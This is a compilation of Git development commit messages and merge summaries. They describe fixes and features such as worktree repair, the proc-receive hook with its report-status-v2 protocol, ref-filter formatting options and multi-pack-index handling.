* rp/apply-cached-doc:
git-apply.txt: update descriptions of --cached, --index
"git restore/checkout --no-overlay" with wildcarded pathspec
mistakenly removed matching paths in subdirectories, which has been
corrected.
* rs/checkout-no-overlay-pathspec-fix:
checkout, restore: make pathspec recursive
Accesses to two pseudorefs have been updated to properly use ref
API.
* hn/refs-pseudorefs:
sequencer: treat REVERT_HEAD as a pseudo ref
builtin/commit: suggest update-ref for pseudoref removal
sequencer: treat CHERRY_PICK_HEAD as a pseudo ref
refs: make refs_ref_exists public
Long ago, we decided to use 3 threads by default when running the
index-pack task in parallel, which has been adjusted a bit upwards.
* jk/index-pack-w-more-threads:
index-pack: adjust default threading cap
p5302: count up to online-cpus for thread tests
p5302: disable thread-count parameter tests by default
The parser for "git for-each-ref --format=..." was too loose when
parsing the "%(trailers...)" atom, and forgot that "trailers" and
"trailers:<modifiers>" are the only two allowed forms, which has
been corrected.
* hv/ref-filter-trailers-atom-parsing-fix:
ref-filter: 'contents:trailers' show error if `:` is missing
t6300: unify %(trailers) and %(contents:trailers) tests
Updates into a lazy/partial clone with a submodule did not work
well with transfer.fsckobjects set.
* jt/promisor-pack-fix:
fetch-pack: in partial clone, pass --promisor
The output from the "diff" family of the commands had abbreviated
object names of blobs involved in the patch, but its length was not
affected by the --abbrev option. Now it is.
* dd/diff-customize-index-line-abbrev:
diff: index-line: respect --abbrev in object's name
t4013: improve diff-post-processor logic
Add separate 'match_missing' field for diff-index to use and set it when we
encounter "-m" option. This field won't then be cleared when another meaning of
"-m" is reverted (e.g., by "--no-diff-merges"), nor it will be affected by
future option(s) that might drive 'ignore_merges' field.
Use this new field from diff-lib:do_oneway_diff() instead of reusing
'ignore_merges' field.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The intention of `git init --separate-work-dir=<path>` is to move the
.git/ directory to a location outside of the main worktree. When used
within a linked worktree, however, rather than moving the .git/
directory as intended, it instead incorrectly moves the worktree's
.git/worktrees/<id> directory to <path>, thus disconnecting the linked
worktree from its parent repository and breaking the worktree in the
process since its local .git file no longer points at a location at
which it can find the object database. Fix this broken behavior.
An intentional side-effect of this change is that it also closes a
loophole not caught by ccf236a23a (init: disallow --separate-git-dir
with bare repository, 2020-08-09) in which the check to prevent
--separate-git-dir being used in conjunction with a bare repository was
unable to detect the invalid combination when invoked from within a
linked worktree. Therefore, add a test to verify that this loophole is
closed, as well.
Reported-by: Henré Botha <henrebotha@gmail.com>
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A linked worktree's .git file is a "gitfile" pointing at the
.git/worktrees/<id> directory within the repository. When `git init
--separate-git-dir=<path>` is used on an existing repository to relocate
the repository's .git/ directory to a different location, it neglects to
update the .git files of linked worktrees, thus breaking the worktrees
by making it impossible for them to locate the repository. Fix this by
teaching --separate-git-dir to repair the .git file of each linked
worktree to point at the new repository location.
Reported-by: Henré Botha <henrebotha@gmail.com>
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The .git/worktrees/<id>/gitdir file points at the location of a linked
worktree's .git file. Its content must be of the form
/path/to/worktree/.git (from which the location of the worktree itself
can be derived by stripping the "/.git" suffix). If the gitdir file is
deleted or becomes corrupted or outdated, then Git will be unable to
find the linked worktree. An easy way for the gitdir file to become
outdated is for the user to move the worktree manually (without using
"git worktree move"). Although it is possible to manually update the
gitdir file to reflect the new linked worktree location, doing so
requires a level of knowledge about worktree internals beyond what a
user should be expected to know offhand.
Therefore, teach "git worktree repair" how to repair broken or outdated
.git/worktrees/<id>/gitdir files automatically. (For this to work, the
command must either be invoked from within the worktree whose gitdir
file requires repair, or from within the main or any linked worktree by
providing the path of the broken worktree as an argument to "git
worktree repair".)
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The .git file in a linked worktree is a "gitfile" which points back to
the .git/worktrees/<id> entry in the main worktree or bare repository.
If a worktree's .git file is deleted or becomes corrupted or outdated,
then the linked worktree won't know how to find the repository or any of
its own administrative files (such as 'index', 'HEAD', etc.). An easy
way for the .git file to become outdated is for the user to move the
main worktree or bare repository. Although it is possible to manually
update each linked worktree's .git file to reflect the new repository
location, doing so requires a level of knowledge about worktree
internals beyond what a user should be expected to know offhand.
Therefore, teach "git worktree repair" how to repair broken or outdated
worktree .git files automatically. (For this to work, the command must
be invoked from within the main worktree or bare repository, or from
within a worktree which has not become disconnected from the repository
-- such as one which was created after the repository was moved.)
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The environment variable `GIT_SEQUENCE_EDITOR`, and the configuration
variable 'sequence.editor', which were added in 821881d88d ("rebase -i":
support special-purpose editor to edit insn sheet, 2011-10-17), are
mentioned in the `git config` man page but not anywhere else.
Include `config/sequencer.txt` in `git-rebase.txt`, so that both the
environment variable and the configuration setting are mentioned there.
Also, add `GIT_SEQUENCE_EDITOR` to the list of environment variables
in `git(1)`.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The name of the "Special-Use Mailboxes" in Gmail are localized
using the user's localization settings. Add a note to that effect
in `git imap-send`'s documentation, to make it easier for users to
configure their account.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As a public service, it is unlikely that the Gmail server is configured
to throw a certificate that does not verify at the user.
Remove the `sslVerify=false` config from the Gmail example.
Also, comment it in the `example.com` example, and add a note to the
user explaining that they might want to uncomment it if they are having
trouble connecting. While at it, use an Asciidoc 'Note' section in the
Gmail example also.
Based-on-patch-by: Barbu Paul - Gheorghe <barbu.paul.gheorghe@gmail.com>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove the 'Examples' subsection in the 'Configuration' section and move
these examples to the 'Examples' section. Also remove the 'Variables'
title since it is now useless.
Also, use appropriate Asciidoc syntax for configuration values, and
capitalize 'Gmail' properly.
Suggested-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Let's refactor code adding a new `write_in_file()` function
that opens a file for writing a message and closes it and a
wrapper for writing mode.
This helper will be used in later steps and makes the code
simpler and easier to understand.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Following 'enum bisect_error' vocabulary, return variable 'res' is
always non-positive.
Let's use '-res' instead of 'abs(res)' to make the code clearer.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In cmd_bisect__helper() function, if an invalid or no
subcommand is passed there is a BUG.
BUG() out instead of returning an error.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When a repository has an alternate object directory configured, callers
can traverse through each alternate's MIDX by walking the '->next'
pointer.
But, when 'prepare_multi_pack_index_one()' loads multiple MIDXs, it
places the new ones at the front of this pointer chain, not at the end.
This can be confusing for callers such as 'git repack -ad', causing test
failures like in t7700.6 with 'GIT_TEST_MULTI_PACK_INDEX=1'.
The occurs when dropping a pack known to the local MIDX with alternates
configured that have their own MIDX. Since the alternate's MIDX is
returned via 'get_multi_pack_index()', 'midx_contains_pack()' returns
true (which is correct, since it traverses through the '->next' pointer
to find the MIDX in the chain that does contain the requested object).
But, we call 'clear_midx_file()' on 'the_repository', which drops the
MIDX at the path of the first MIDX in the chain, which (in the case of
t7700.6 is the one in the alternate).
This patch addresses that by:
- placing the local MIDX first in the chain when calling
'prepare_multi_pack_index_one()', and
- introducing a new 'get_local_multi_pack_index()', which explicitly
returns the repository-local MIDX, if any.
Don't impose an additional order on the MIDX's '->next' pointer beyond
that the first item in the chain must be local if one exists so that we
avoid a quadratic insertion.
Likewise, use 'get_local_multi_pack_index()' in
'remove_redundant_pack()' to fix the formerly broken t7700.6 when run
with 'GIT_TEST_MULTI_PACK_INDEX=1'.
Finally, note that the MIDX ordering invariant is only preserved by the
insertion order in 'prepare_packed_git()', which traverses through the
ODB's '->next' pointer, meaning we visit the local object store first.
This fragility makes this an undesirable long-term solution if more
callers are added, but it is acceptable for now since this is the only
caller.
Helped-by: Jeff King <peff@peff.net>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The positional arguments are specified in this order: "bad" then "good".
To avoid confusion, the options above the positional arguments
are now specified in the same order. They can still be specified in any
order since they're options, not positional arguments.
Signed-off-by: Hugo Locurcio <hugo.locurcio@hugo.pro>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add the missing "e" in "de". While it is possible in French to omit it,
that only occurs with an apostrophe and only when the next word starts
with a vowel or mute h, which is not the case here.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Acked-by: Jean-Noël Avila <jn.avila@free.fr>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently, subject does not take any arguments. This commit introduce
`sanitize` formatting option to 'subject' atom.
`subject:sanitize` - print sanitized subject line, suitable for a filename.
e.g.
%(subject): "the subject line"
%(subject:sanitize): "the-subject-line"
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The function 'format_sanitized_subject()' is responsible for
sanitized subject line in pretty.c
e.g.
the subject line
the-sanitized-subject-line
It would be a nice enhancement to `subject` atom to have the
same feature. So in the later commits, we plan to add this feature
to ref-filter.
Refactor `format_sanitized_subject()`, so it can be reused in
ref-filter.c for adding new modifier `sanitize` to "subject" atom.
Currently, the loop inside `format_sanitized_subject()` runs
until `\n` is found. But now, we stored the first occurrence
of `\n` in a variable `eol` and passed it in
`format_sanitized_subject()`. And the loop runs upto `eol`.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Sometimes while using 'parent' atom, user might want to see abbrev hash
instead of full 40 character hash.
Just like 'objectname', it might be convenient for users to have the
`:short` and `:short=<length>` option for printing 'parent' hash.
Let's introduce `short` option to 'parent' atom.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Sometimes while using 'tree' atom, user might want to see abbrev hash
instead of full 40 character hash.
Just like 'objectname', it might be convenient for users to have the
`:short` and `:short=<length>` option for printing 'tree' hash.
Let's introduce `short` option to 'tree' atom.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In previous commits, we prepared some `objectname` related functions
for more generic usage, so that these functions can be used for `tree`
and `parent` atom.
But the name of some functions and fields may mislead someone.
For ex: function `objectname_atom_parser()` implies that it is
for atom `objectname`.
Let's rename all such functions and fields.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As we plan to use `grab_objectname()` for `tree` and `parent` atom,
it's better to parameterize the error messages in the function
`grab_objectname()` where "objectname" is hard coded.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Prepares `grab_objectname()` for more generic usage.
This change will allow us to reuse `grab_objectname()` for
the `tree` and `parent` atoms in a following commit.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently, ref-filter only supports printing email with angle brackets.
Let's add support for two more email options.
- trim : for email without angle brackets.
- localpart : for the part before the @ sign out of trimmed email
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Because the hook runs after the main checkout operation finishes, it
cannot affect what branch will be the current branch, what paths are
updated in the working tree, etc., which was described as "cannot
affect the outcome of 'checkout'".
However, the exit status of the hook is used as the exit status of
the 'checkout' command and is observable by anybody who spawned the
'checkout', which was missing from the documentation. Fix this.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The FETCH_HEAD is now always read from the filesystem regardless of
the ref backend in use, as its format is much richer than the
normal refs, and written directly by "git fetch" as a plain file..
* hn/refs-fetch-head-is-special:
refs: read FETCH_HEAD and MERGE_HEAD generically
refs: move gitdir into base ref_store
refs: fix comment about submodule ref_stores
refs: split off reading loose ref data in separate function
Command line completion (in contrib/) usually omits redundant,
deprecated and/or dangerous options from its output; it learned to
optionally include all of them.
* rz/complete-more-options:
completion: add GIT_COMPLETION_SHOW_ALL env var
parse-options: add --git-completion-helper-all
Code clean-up.
* jk/leakfix:
submodule--helper: fix leak of core.worktree value
config: fix leak in git_config_get_expiry_in_days()
config: drop git_config_get_string_const()
config: fix leaks from git_config_get_string_const()
checkout: fix leak of non-existent branch names
submodule--helper: use strbuf_release() to free strbufs
clear_pattern_list(): clear embedded hashmaps
API update.
* en/mem-pool:
mem-pool: use consistent pool variable name
mem-pool: use more standard initialization and finalization
mem-pool: add convenience functions for strdup and strndup
"git receive-pack" that accepts requests by "git push" learned to
outsource some of the ref updates to the new "proc-receive" hook.
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When pushing a pseudo reference (such as "refs/for/master/topic"), may
create or update one or more references. The real names of the
references will be stored in the report options. Parse report options
to create or update remote-tracking branches properly.
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In order to test update of remote-tracking branches for special refs,
add new "remote.origin.fetch" settings and test cases.
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a new multi-valued config variable "receive.procReceiveRefs"
for `receive-pack` command, like the follows:
git config --system --add receive.procReceiveRefs refs/for
git config --system --add receive.procReceiveRefs refs/drafts
If the specific prefix strings given by the config variables match the
reference names of the commands which are sent from git client to
`receive-pack`, these commands will be executed by an external hook
(named "proc-receive"), instead of the internal `execute_commands`
function.
For example, if it is set to "refs/for", pushing to a reference such as
"refs/for/master" will not create or update reference "refs/for/master",
but may create or update a pull request directly by running the hook
"proc-receive".
Optional modifiers can be provided in the beginning of the value to
filter commands for specific actions: create (a), modify (m),
delete (d). A `!` can be included in the modifiers to negate the
reference prefix entry. E.g.:
git config --system --add receive.procReceiveRefs ad:refs/heads
git config --system --add receive.procReceiveRefs !:refs/heads
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add ABNF notation for capability 'report-status-v2' which extends
capability 'report-status' by adding additional option lines.
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The new introduced "proc-receive" hook may handle a command for a
pseudo-reference with a zero-old as its old-oid, while the hook may
create or update a reference with different name, different new-oid,
and different old-oid (the reference may exist already with a non-zero
old-oid). Current "report-status" protocol cannot report the status for
such reference rewrite.
Add new capability "report-status-v2" and new report protocol which is
not backward compatible for report of git-push.
If a user pushes to a pseudo-reference "refs/for/master/topic", and
"receive-pack" creates two new references "refs/changes/23/123/1" and
"refs/changes/24/124/1", for client without the knowledge of
"report-status-v2", "receive-pack" will only send "ok/ng" directives in
the report, such as:
ok ref/for/master/topic
But for client which has the knowledge of "report-status-v2",
"receive-pack" will use "option" directives to report more attributes
for the reference given by the above "ok/ng" directive.
ok refs/for/master/topic
option refname refs/changes/23/123/1
option new-oid <new-oid>
ok refs/for/master/topic
option refname refs/changes/24/124/1
option new-oid <new-oid>
The client will report two new created references to the end user.
Suggested-by: Junio C Hamano <gitster@pobox.com>
Suggested-by: Jeff King <peff@peff.net>
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When commands are fed to the "post-receive" hook, report options will
be parsed and the real old-oid, new-oid, reference name will feed to
the "post-receive" hook.
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Git calls an internal `execute_commands` function to handle commands
sent from client to `git-receive-pack`. Regardless of what references
the user pushes, git creates or updates the corresponding references if
the user has write-permission. A contributor who has no
write-permission, cannot push to the repository directly. So, the
contributor has to write commits to an alternate location, and sends
pull request by emails or by other ways. We call this workflow as a
distributed workflow.
It would be more convenient to work in a centralized workflow like what
Gerrit provided for some cases. For example, a read-only user who
cannot push to a branch directly can run the following `git push`
command to push commits to a pseudo reference (has a prefix "refs/for/",
not "refs/heads/") to create a code review.
git push origin \
HEAD:refs/for/<branch-name>/<session>
The `<branch-name>` in the above example can be as simple as "master",
or a more complicated branch name like "foo/bar". The `<session>` in
the above example command can be the local branch name of the client
side, such as "my/topic".
We cannot implement a centralized workflow elegantly by using
"pre-receive" + "post-receive", because Git will call the internal
function "execute_commands" to create references (even the special
pseudo reference) between these two hooks. Even though we can delete
the temporarily created pseudo reference via the "post-receive" hook,
having a temporary reference is not safe for concurrent pushes.
So, add a filter and a new handler to support this kind of workflow.
The filter will check the prefix of the reference name, and if the
command has a special reference name, the filter will turn a specific
field (`run_proc_receive`) on for the command. Commands with this filed
turned on will be executed by a new handler (a hook named
"proc-receive") instead of the internal `execute_commands` function.
We can use this "proc-receive" command to create pull requests or send
emails for code review.
Suggested by Junio, this "proc-receive" hook reads the commands,
push-options (optional), and send result using a protocol in pkt-line
format. In the following example, the letter "S" stands for
"receive-pack" and letter "H" stands for the hook.
# Version and features negotiation.
S: PKT-LINE(version=1\0push-options atomic...)
S: flush-pkt
H: PKT-LINE(version=1\0push-options...)
H: flush-pkt
# Send commands from server to the hook.
S: PKT-LINE(<old-oid> <new-oid> <ref>)
S: ... ...
S: flush-pkt
# Send push-options only if the 'push-options' feature is enabled.
S: PKT-LINE(push-option)
S: ... ...
S: flush-pkt
# Receive result from the hook.
# OK, run this command successfully.
H: PKT-LINE(ok <ref>)
# NO, I reject it.
H: PKT-LINE(ng <ref> <reason>)
# Fall through, let 'receive-pack' to execute it.
H: PKT-LINE(ok <ref>)
H: PKT-LINE(option fall-through)
# OK, but has an alternate reference. The alternate reference name
# and other status can be given in options
H: PKT-LINE(ok <ref>)
H: PKT-LINE(option refname <refname>)
H: PKT-LINE(option old-oid <old-oid>)
H: PKT-LINE(option new-oid <new-oid>)
H: PKT-LINE(option forced-update)
H: ... ...
H: flush-pkt
After receiving a command, the hook will execute the command, and may
create/update different reference. For example, a command for a pseudo
reference "refs/for/master/topic" may create/update different reference
such as "refs/pull/123/head". The alternate reference name and other
status are given in option lines.
The list of commands returned from "proc-receive" will replace the
relevant commands that are sent from user to "receive-pack", and
"receive-pack" will continue to run the "execute_commands" function and
other routines. Finally, the result of the execution of these commands
will be reported to end user.
The reporting function from "receive-pack" to "send-pack" will be
extended in latter commit just like what the "proc-receive" hook reports
to "receive-pack".
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Topic "proc-receive-hook" will change the workflow and output of
git-push. Add some basic test cases in t5411 before introducing the new
topic.
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When pushing a new reference (not a head or tag), report it as a new
reference instead of a new branch.
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'grep' check in test 4 of t7421 resulted in the failure of t7421 on
Windows due to a different error message
error: cannot spawn git: No such file or directory
instead of
fatal: exec 'rev-parse': cd to 'my-subm' failed: No such file or directory
Tighten up the check to compute 'src_abbrev' by guarding the
'verify_submodule_committish()' call using `p->status !='D'`, so that
the former isn't called in case of non-existent submodule directory,
consequently, there is no such error message on any execution
environment. The same need not be implemented for 'dst_abbrev' and is
rather redundant since the conditional 'if (S_ISGITLINK(p->mod_dst))'
already guards the 'verify_submodule_committish()' when we have a
status of 'D'.
Therefore, eliminate the 'grep' check in t7421. Instead, verify the
absence of an error message by doing a 'test_must_be_empty' on the
file containing the error.
Reported-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Helped-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Signed-off-by: Shourya Shukla <shouryashukla.oo@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Worktree administrative files can become corrupted or outdated due to
external factors. Although, it is often possible to recover from such
situations by hand-tweaking these files, doing so requires intimate
knowledge of worktree internals. While information necessary to make
such repairs manually can be obtained from git-worktree.txt and
gitrepository-layout.txt, we can assist users more directly by teaching
git-worktree how to repair its administrative files itself (at least to
some extent). Therefore, add a "git worktree repair" command which
attempts to correct common problems which may arise due to factors
beyond Git's control.
At this stage, the "repair" command is a mere skeleton; subsequent
commits will flesh out the functionality.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Description suggested --no-abbrev-commit negates --oneline as well as any other
option that implies --abbrev-commit. Fix it to say that it's --abbrev-commit
that is negated, not the option that implies it.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As child_process structure has an embedded strvec args for
formulating the command line, let's use it instead of using
an out-of-line argv[] whose length needs to be maintained
correctly.
Also, when spawning a git subcommand, omit it from the command list
and instead use the .git_cmd bit in the child_process structure.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We allocate a child_env strvec but never free its memory. Instead, let's
just use the strvec that our child_process struct provides, which is
cleaned up automatically when we run the command.
And while we're moving the initialization of the child_process around,
let's switch it to use the official init function (zero-initializing it
works OK, since strvec is happy enough with that, but it sets a bad
example).
Signed-off-by: Jeff King <peff@peff.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The child_process structure has an embedded strvec for formulating
the command line argument list these days, but code that predates
the wide use of it prepared a separate char *argv[] array and
manually set the child_process.argv pointer point at it.
Teach these old-style code to lose the separate argv[] array.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This ancient script runs "git-foo" all over the place, which is
OK for a scripted Porcelain in the Git suite, but asking "git" to
dispatch to subcommands is the usual way these days.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Running it as "git remote-ext" and letting "git" dispatch to
"remote-ext" would just be fine and is more idiomatic.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 525e18c04b (midx: clear midx on repack, 2018-07-12), 'git repack'
learned to remove a multi-pack-index file if it added or removed a pack
from the object store.
This mechanism is a little over-eager, since it is only necessary to
drop a MIDX if 'git repack' removes a pack that the MIDX references.
Adding a pack outside of the MIDX does not require invalidating the
MIDX, and likewise for removing a pack the MIDX does not know about.
Teach 'git repack' to check for this by loading the MIDX, and checking
whether the to-be-removed pack is known to the MIDX. This requires a
slightly odd alternation to a test in t5319, which is explained with a
comment. A new test is added to show that the MIDX is left alone when
both packs known to it are marked as .keep, but two packs unknown to it
are removed and combined into one new pack.
Helped-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 7ba826290a (revision: add rev_input_given flag, 2017-08-02) added
a flag to rev_info to tell whether we got any revision arguments. As
explained there, this is necessary because some revision arguments may
not produce any pending traversal objects, but should still inhibit
default behaviors (e.g., a glob that matches nothing).
However, it only set the flag in the globbing code, but not for
revisions we get on the command-line or via stdin. This leads to two
problems:
- the command-line code keeps its own separate got_rev_arg flag; this
isn't wrong, but it's confusing and an extra maintenance burden
- even specifically-named rev arguments might end up not adding any
pending objects: if --ignore-missing is set, then specifying a
missing object is a noop rather than an error.
And that leads to some user-visible bugs:
- when deciding whether a default rev like "HEAD" should kick in, we
check both got_rev_arg and rev_input_given. That means that
"--ignore-missing $ZERO_OID" works on the command-line (where we set
got_rev_arg) but not on --stdin (where we don't)
- when rev-list decides whether it should complain that it wasn't
given a starting point, it relies on rev_input_given. So it can't
even get the command-line "--ignore-missing $ZERO_OID" right
Let's consistently set the flag if we got any revision argument. That
lets us clean up the redundant got_rev_arg, and fixes both of those bugs
(but note there are three new tests: we'll confirm the already working
git-log command-line case).
A few implementation notes:
- conceptually we want to set the flag whenever handle_revision_arg()
finds an actual revision arg ("handles" it, you might say). But it
covers a ton of cases with early returns. Rather than annotating
each one, we just wrap it and use its success exit-code to set the
flag in one spot.
- the new rev-list test is in t6018, which is titled to cover globs.
This isn't exactly a glob, but it made sense to stick it with the
other tests that handle the "even though we got a rev, we have no
pending objects" case, which are globs.
- the tests check for the oid of a missing object, which it's pretty
clear --ignore-missing should ignore. You can see the same behavior
with "--ignore-missing a-ref-that-does-not-exist", because
--ignore-missing treats them both the same. That's perhaps less
clearly correct, and we may want to change that in the future. But
the way the code and tests here are written, we'd continue to do the
right thing even if it does.
Reported-by: Bryan Turner <bturner@atlassian.com>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When adding the reference-transaction hook, there were concerns about
the performance impact it may have on setups which do not make use of
the new hook at all. After all, it gets executed every time a reftx is
prepared, committed or aborted, which linearly scales with the number of
reference-transactions created per session. And as there are code paths
like `git push` which create a new transaction for each reference to be
updated, this may translate to calling `find_hook()` quite a lot.
To address this concern, a cache was added with the intention to not
repeatedly do negative hook lookups. Turns out this cache caused a
regression, which was fixed via e5256c82e5 (refs: fix interleaving hook
calls with reference-transaction hook, 2020-08-07). In the process of
discussing the fix, we realized that the cache doesn't really help even
in the negative-lookup case. While performance tests added to benchmark
this did show a slight improvement in the 1% range, this really doesn't
warrent having a cache. Furthermore, it's quite flaky, too. E.g. running
it twice in succession produces the following results:
Test master pks-reftx-hook-remove-cache
--------------------------------------------------------------------------
1400.2: update-ref 2.79(2.16+0.74) 2.73(2.12+0.71) -2.2%
1400.3: update-ref --stdin 0.22(0.08+0.14) 0.21(0.08+0.12) -4.5%
Test master pks-reftx-hook-remove-cache
--------------------------------------------------------------------------
1400.2: update-ref 2.70(2.09+0.72) 2.74(2.13+0.71) +1.5%
1400.3: update-ref --stdin 0.21(0.10+0.10) 0.21(0.08+0.13) +0.0%
One case notably absent from those benchmarks is a single executable
searching for the hook hundreds of times, which is exactly the case for
which the negative cache was added. p1400.2 will spawn a new update-ref
for each transaction and p1400.3 only has a single reference-transaction
for all reference updates. So this commit adds a third benchmark, which
performs an non-atomic push of a thousand references. This will create a
new reference transaction per reference. But even for this case, the
negative cache doesn't consistently improve performance:
Test master pks-reftx-hook-remove-cache
--------------------------------------------------------------------------
1400.4: nonatomic push 6.63(6.50+0.13) 6.81(6.67+0.14) +2.7%
1400.4: nonatomic push 6.35(6.21+0.14) 6.39(6.23+0.16) +0.6%
1400.4: nonatomic push 6.43(6.31+0.13) 6.42(6.28+0.15) -0.2%
So let's just remove the cache altogether to simplify the code.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The definitions of 'verify_submodule_committish()' and
'print_submodule_summary()' had wrong styling in terms of the asterisk
placement. Amend them.
Also, the warning printed in case of an unexpected file mode printed the
mode in decimal. Print it in octal for enhanced readability.
Reported-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Shourya Shukla <shouryashukla.oo@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When fetching with packfile URIs and transfer.fsckobjects=1, use the
--fsck-objects instead of the --strict flag when invoking index-pack so
that links are not checked, only objects. This is because incomplete
links are expected. (A subsequent connectivity check will be done when
all the packs have been downloaded regardless of whether
transfer.fsckobjects is set.)
This is similar to 98a2ea46c2 ("fetch-pack: do not check links for
partial fetch", 2018-03-15), but for packfile URIs instead of partial
clones.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
